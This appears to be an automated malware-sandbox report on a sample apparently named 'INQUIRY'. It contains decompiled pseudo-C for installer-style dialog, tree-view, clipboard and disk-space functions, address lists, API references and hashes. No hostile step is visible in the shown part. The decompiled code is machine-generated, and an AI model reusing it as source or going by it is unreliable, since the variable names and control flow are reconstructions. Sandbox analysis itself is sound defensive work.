					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x0040510d
0x00405114
0x00405138
0x00405138
0x0040513e
0x0040514b
0x00405169
0x00405169
0x00405170
0x004051c7
0x004051c7
0x004051cb
0x00000000
0x00000000
0x004051cd
0x004051d0
0x00000000
0x00000000
0x004051da
0x004051e0
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x00405209
0x0040520c
0x00405221
0x00405224
0x00405224
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405240
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x00405272
0x00405278
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x00405172
0x00405178
0x004051a8
0x004051aa
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(00000000,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32(00000001,00000000), ref: 004052D2
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x51d9c4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x51d818
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x1
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x51d9c4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x5233c1
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x51d9cc
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x51d9dc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047a7
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a06
0x00404a0f
0x00404a1a
0x00404a1a
0x00404a1d
0x00404a20
0x00404a2f
0x00404a2f
0x00404a36
0x00404aae
0x00404aae
0x00404ab1
0x00404ab3
0x00404ab6
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad0
0x00404ad7
0x00404ad9
0x00404add
0x00404afa
0x00404afe
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a38
0x00404a3b
0x00404a46
0x00404a48
0x00404a4b
0x00404a52
0x00404a57
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a69
0x00404a6c
0x00404a6e
0x00404a71
0x00404a87
0x00404a87
0x00404a73
0x00404a73
0x00404a79
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a92
0x00404a9b
0x00404a9c
0x00404aa6
0x00404aa6
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a40
0x00404a44
0x00000000
0x00000000
0x00000000
0x00404a44
0x00404a22
0x00404a29
0x00000000
0x00000000
0x00000000
0x00404a11
0x00404a11
0x00404a14
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b91
0x00404b98
0x00404b9a
0x00404b9f
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404baf
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bcc
0x00404bd3
0x00404d20
0x00404d20
0x00404d27
0x00404d29
0x00404d30
0x00404d34
0x00404d41
0x00404d41
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00404d30
0x00000000
0x00404bd9
0x00404bdb
0x00404be0
0x00404be3
0x00404be7
0x00404be7
0x00404bec
0x00404bef
0x00404c30
0x00404c32
0x00404c3c
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d02
0x00404d07
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404c5a
0x00404c5a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c66
0x00404c68
0x00404c6a
0x00404c6c
0x00404c6f
0x00404c72
0x00404c79
0x00404c7b
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c88
0x00404c88
0x00404c8c
0x00404c8f
0x00404c9b
0x00404c9c
0x00404c9f
0x00404ca1
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc0
0x00404cc0
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00404cea
0x00000000
0x00404c5d
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c08
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c0c
0x00404c0f
0x00404c12
0x00404c14
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b0a
0x00404b10
0x00000000
0x00000000
0x00404b1c
0x00404b20
0x00000000
0x00000000
0x00404b30
0x00404b32
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b49
0x00404b4c
0x00404b56
0x00404b58
0x00404b59
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b4e
0x00404b51
0x00404b54
0x00000000
0x00000000
0x00000000
0x00404b54
0x00000000
0x00404a14
0x004047c6
0x004047cb
0x004047d0
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048d4
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404957
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x0040498f
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,00000001), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32 ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32 ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

N, xrefs: 00404A06
, xrefs: 00404D34
M, xrefs: 00404922

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
